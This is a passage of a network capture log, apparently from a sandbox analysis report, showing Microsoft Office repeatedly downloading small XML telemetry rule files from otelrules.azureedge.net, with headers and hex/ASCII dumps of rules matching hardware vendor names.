                                                                                                                                      2024-11-29 22:11:13 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      54192.168.2.44980113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:13 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                      x-ms-request-id: 7e299a61-c01e-0049-0c07-41ac27000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221113Z-174f7845968qj8jrhC1EWRh41s00000010k0000000002xbr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      55192.168.2.44980813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:13 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:14 UTC471INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                      x-ms-request-id: 25bfb1e7-201e-00aa-3dab-423928000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221113Z-174f7845968ljs8phC1EWRe6en00000010ag00000000f8ue
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      56192.168.2.44980913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:14 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                      x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221114Z-174f78459684bddphC1EWRbht4000000107000000000en6q
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:14 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      57192.168.2.44980713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:14 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                      x-ms-request-id: 2bae3e0a-f01e-0085-5747-4188ea000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221114Z-174f7845968frfdmhC1EWRxxbw00000010mg000000008pad
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:15 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      58192.168.2.44981013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:14 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:15 UTC491INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:14 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 494
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                      x-ms-request-id: 7090c7f2-e01e-000c-3ea1-428e36000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221114Z-174f7845968n2hr8hC1EWR9cag000000101g00000000qap1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:15 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      59192.168.2.44981113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:15 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 420
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                      x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221115Z-174f7845968frfdmhC1EWRxxbw00000010pg000000002v53
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:16 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      60192.168.2.44981213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:15 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                      x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221116Z-174f7845968qj8jrhC1EWRh41s00000010bg00000000qa98
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:16 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      61192.168.2.44981313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:16 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                      x-ms-request-id: 27d1d277-c01e-0014-7129-40a6a3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221116Z-174f7845968n2hr8hC1EWR9cag000000105000000000canv
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:17 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      62192.168.2.44981413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:16 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:17 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 486
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                      x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221117Z-174f7845968frfdmhC1EWRxxbw00000010gg00000000fpse
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:17 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      63192.168.2.44981513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:16 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:17 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 423
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                      x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221117Z-174f78459688l8rvhC1EWRtzr00000000d60000000004twy
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
